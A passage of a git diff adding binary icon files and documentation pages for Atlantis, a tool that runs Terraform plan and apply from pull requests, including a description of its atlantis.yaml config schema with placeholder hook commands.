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
KMNUMnLSTYVHT)w0

literal 0
HcmV?d00001

diff --git a/runatlantis.io/.vuepress/public/mstile-70x70.png b/runatlantis.io/.vuepress/public/mstile-70x70.png
new file mode 100644
index 0000000000000000000000000000000000000000..d9b35bcac4c932babf614db9dd1e81e882202b13
GIT binary patch
literal 6555
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
N002ovPDHLkV1hb}+mQeO

literal 0
HcmV?d00001

diff --git a/runatlantis.io/README.md b/runatlantis.io/README.md
new file mode 100644
index 0000000000..0d9f017a4a
--- /dev/null
+++ b/runatlantis.io/README.md
@@ -0,0 +1,16 @@
+---
+layout: Home
+pageClass: home-custom
+home: true
+heroImage: /hero.png
+heroText: Atlantis
+actionText: Get Started →
+actionLink: /docs/
+features:
+- title: Collaborate
+  details: Run terraform plan and apply from GitHub/GitLab pull requests so everyone can review the output
+- title: Secure Your Credentials
+  details: No need to distribute credentials to your whole team. Developers can submit Terraform changes and run plan and apply directly from the pull request.
+- title: Lock Terraform States
+  details: Lock states until pull requests are merged to prevent concurrent modification and confusion.
+---
diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md
new file mode 100644
index 0000000000..ad31df63e6
--- /dev/null
+++ b/runatlantis.io/docs/README.md
@@ -0,0 +1,405 @@
+# Atlantis
+
+## Walkthrough Video
+[![Atlantis Walkthrough](./images/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
+
+Read about [Why We Built Atlantis](https://medium.com/runatlantis/introducing-atlantis-6570d6de7281)
+
+[![CircleCI](https://circleci.com/gh/runatlantis/atlantis/tree/master.svg?style=shield)](https://circleci.com/gh/runatlantis/atlantis/tree/master)
+[![SuperDopeBadge](https://img.shields.io/badge/Hightower-extra%20dope-b9f2ff.svg)](https://twitter.com/kelseyhightower/status/893260922222813184)
+[![Slack Status](https://thawing-headland-22460.herokuapp.com/badge.svg)](https://thawing-headland-22460.herokuapp.com)
+[![Go Report Card](https://goreportcard.com/badge/github.com/runatlantis/atlantis)](https://goreportcard.com/report/github.com/runatlantis/atlantis)
+
+* [Features](#features)
+* [Atlantis Works With](#atlantis-works-with)
+* [Getting Started](#getting-started)
+* [Pull/Merge Request Commands](#pullmerge-request-commands)
+* [Project Structure](#project-structure)
+* [Workspaces/Environments](#workspacesenvironments)
+* [Terraform Versions](#terraform-versions)
+* [Project-Specific Customization](#project-specific-customization)
+* [Locking](#locking)
+* [Approvals](#approvals)
+* [Security](#security)
+* [Production-Ready Deployment](#production-ready-deployment)
+    * [Docker](#docker)
+    * [Kubernetes](#kubernetes)
+    * [AWS Fargate](#aws-fargate)
+* [Server Configuration](#server-configuration)
+* [AWS Credentials](#aws-credentials)
+* [Glossary](#glossary)
+    * [Project](#project)
+    * [Workspace/Environment](#workspaceenvironment)
+* [FAQ](#faq)
+* [Contributing](#contributing)
+* [Credits](#credits)
+
+## Features
+➜ Collaborate on Terraform with your team
+- Run terraform `plan` and `apply` **from GitHub pull requests** so everyone can review the output
+- **Lock workspaces** until pull requests are merged to prevent concurrent modification and confusion
+
+➜ Developers can write Terraform safely
+- **No need to distribute AWS credentials** to your whole team. Developers can submit Terraform changes and run `plan` and `apply` directly from the pull/merge request
+- Optionally, require a **review and approval** prior to running `apply`
+
+➜ Also
+- Support **multiple versions of Terraform** with a simple project config file
+
+## Atlantis Works With
+* GitHub (public, private or enterprise) and GitLab (public, private or enterprise)
+* Any Terraform version (see [Terraform Versions](#terraform-version))
+* Can be run with a [single binary](https://github.com/runatlantis/atlantis/releases) or with our [Docker image](https://hub.docker.com/r/runatlantis/atlantis/)
+* Any repository structure
+
+## Getting Started
+Download from [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
+
+Run
+```
+./atlantis testdrive
+```
+This mode sets up Atlantis on a test repo so you can try it out. It will
+- fork an example terraform project
+- install terraform (if not already in your PATH)
+- install ngrok so we can expose Atlantis to GitHub
+- start Atlantis
+
+If you're ready to permanently set up Atlantis see [Production-Ready Deployment](#production-ready-deployment).
+
+
+
+## Project Structure
+Atlantis supports several Terraform project structures:
+- a single Terraform project at the repo root
+```
+.
+├── main.tf
+└── ...
+```
+-  multiple project folders in a single repo (monorepo)
+```
+.
+├── project1
+│   ├── main.tf
+|   └── ...
+└── project2
+    ├── main.tf
+    └── ...
+```
+-  one folder per set of configuration
+```
+.
+├── staging
+│   ├── main.tf
+|   └── ...
+└── production
+    ├── main.tf
+    └── ...
+```
+-  using `env/{env}.tfvars` to define workspace specific variables. This works in both multi-project repos and single-project repos.
+```
+.
+├── env
+│   ├── production.tfvars
+│   └── staging.tfvars
+└── main.tf
+```
+or
+```
+.
+├── project1
+│   ├── env
+│   │   ├── production.tfvars
+│   │   └── staging.tfvars
+│   └── main.tf
+└── project2
+    ├── env
+    │   ├── production.tfvars
+    │   └── staging.tfvars
+    └── main.tf
+```
+With the above project structure you can de-duplicate your Terraform code between workspaces/environments without requiring extensive use of modules. At Hootsuite we found this project format to be very successful and use it in all of our 100+ Terraform repositories.
+
+## Workspaces/Environments
+Terraform introduced [Workspaces](https://www.terraform.io/docs/state/workspaces.html) in 0.9. They allow for
+> a single directory of Terraform configuration to be used to manage multiple distinct sets of infrastructure resources
+
+If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through the `-w` flag.
+For example,
+```
+atlantis plan -w staging
+```
+
+If a workspace is specified, Atlantis will use `terraform workspace select {workspace}` prior to running `terraform plan` or `terraform apply`.
+
+If you're using the `env/{env}.tfvars` [project structure](#project-structure) we will also append `-var-file=env/{env}.tfvars` to `plan` and `apply`.
+
+If no workspace is specified, we'll use the `default` workspace by default.
+This replicates Terraform's default behaviour which also uses the `default` workspace.
+
+## Terraform Versions
+By default, Atlantis will use the `terraform` executable that is in its path. To use a specific version of Terraform just install that version on the server that Atlantis is running on.
+
+If you would like to use a different version of Terraform for some projects but not for others
+1. Install the desired version of Terraform into the `$PATH` of where Atlantis is running and name it `terraform{version}`, ex. `terraform0.8.8`.
+2. In the project root (which is not necessarily the repo root) of any project that needs a specific version, create an `atlantis.yaml` file as follows
+```
+---
+terraform_version: 0.8.8 # set to desired version
+```
+
+So your project structure will look like
+```
+.
+├── main.tf
+└── atlantis.yaml
+```
+Now when Atlantis executes it will use the `terraform{version}` executable.
+
+## Project-Specific Customization
+An `atlantis.yaml` config file in your project root (which is not necessarily the repo root) can be used to customize
+- what commands Atlantis runs **before** `init`, `get`, `plan` and `apply` with `pre_init`, `pre_get`, `pre_plan` and `pre_apply`
+- what commands Atlantis runs **after** `plan` and `apply` with `post_plan` and `post_apply`
+- additional arguments to be supplied to specific terraform commands with `extra_arguments`
+    - the commmands that we support adding extra args to are `init`, `get`, `plan` and `apply`
+- what version of Terraform to use (see [Terraform Versions](#terraform-versions))
+
+The schema of the `atlantis.yaml` project config file is
+
+```yaml
+# atlantis.yaml
+---
+terraform_version: 0.8.8 # optional version
+# pre_init commands are run when the Terraform version is >= 0.9.0
+pre_init:
+  commands:
+  - "curl http://example.com"
+# pre_get commands are run when the Terraform version is < 0.9.0
+pre_get:
+  commands:
+  - "curl http://example.com"
+pre_plan:
+  commands:
+  - "curl http://example.com"
+post_plan:
+  commands:
+  - "curl http://example.com"
+pre_apply:
+  commands:
+  - "curl http://example.com"
+post_apply:
+  commands:
+  - "curl http://example.com"
+extra_arguments:
+  - command_name: plan
+    arguments:
+    - "-var-file=terraform.tfvars"
+```
+
+When running the `pre_plan`, `post_plan`, `pre_apply`, and `post_apply` commands the following environment variables are available
+- `WORKSPACE`: if a workspace argument is supplied to `atlantis plan` or `atlantis apply`, ex `atlantis plan -w staging`, this will
+be the value of that argument. Else it will be `default`
+- `ATLANTIS_TERRAFORM_VERSION`: local version of `terraform` or the version from `terraform_version` if specified, ex. `0.8.8`
+- `DIR`: absolute path to the root of the project on disk
+
+## Locking
